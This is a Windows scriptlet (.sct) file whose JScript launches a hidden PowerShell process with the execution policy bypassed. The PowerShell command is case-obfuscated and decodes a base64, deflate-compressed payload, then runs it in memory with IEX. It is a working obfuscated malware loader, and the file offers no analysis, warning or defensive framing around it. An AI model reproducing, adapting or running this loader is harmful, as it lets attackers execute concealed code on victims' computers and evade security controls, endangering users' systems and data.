<?XML version="1.0"?>
<scriptlet>
<registration 
progid="oWa"
classid="{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("poWERSheLL  -noP  -NoLOGo -WINdOWSty HIDDeN -NOE -executiONPolic BypAsS  -NonINTeRaC  -com  ( NEW-OBJeCT  iO.ComPrEssION.dEflateStREAm([IO.mEmorYstream][SysteM.CoNVErT]::FROMbasE64sTRIng( 'TVFha8IwEP0rIQxjYabWOueUfZCajTFxzjlExiBtzbRDW1cjFrr8990lsA3ycuHu3b27XKNJ68DUbUNbH4QJzS7ZkXlkHT5vAkKahLzp1Uy8A6tt6o5BbmjqrqEE+blYQEI6F2sBlgNynY3ATKI43QooROAMoVDD6XR+pVSKWlMF17n1lHwC14mExhEty8YTQLTLVI4Zmi8V8zxOZ2UhqxXlNJpLJddqusji3Qu9JeRiHH7dB4MBHUsh70avk0UuhV4W5WMk50KOJXAfkDvkTjJwYhn2UjKvCd4b8GKkC7gylgRdBe4Hgh7gGtC3E+EL+H3XOwASen+fxDeZ3p6S01GVaZHbEdJi7xfnGN6xv0eTHNMyO2AMUOQcTYW70Kr0wZ4AW60Pdj2OpWwp7Hng+yWWOsO1Q0eqcmQp0HD79L4b/ya1g6qKeT8=') ,[SySteM.iO.COmPressiOn.COmprEssioNMOde]::DEcoMpReSs ) |% {NEW-OBJeCT io.STreamREADER( $_,[sySTem.tExT.EnCOdIng]::aScII )}).rEADtoENd( )| IEX");
	]]>
</script>
</registration>
</scriptlet>
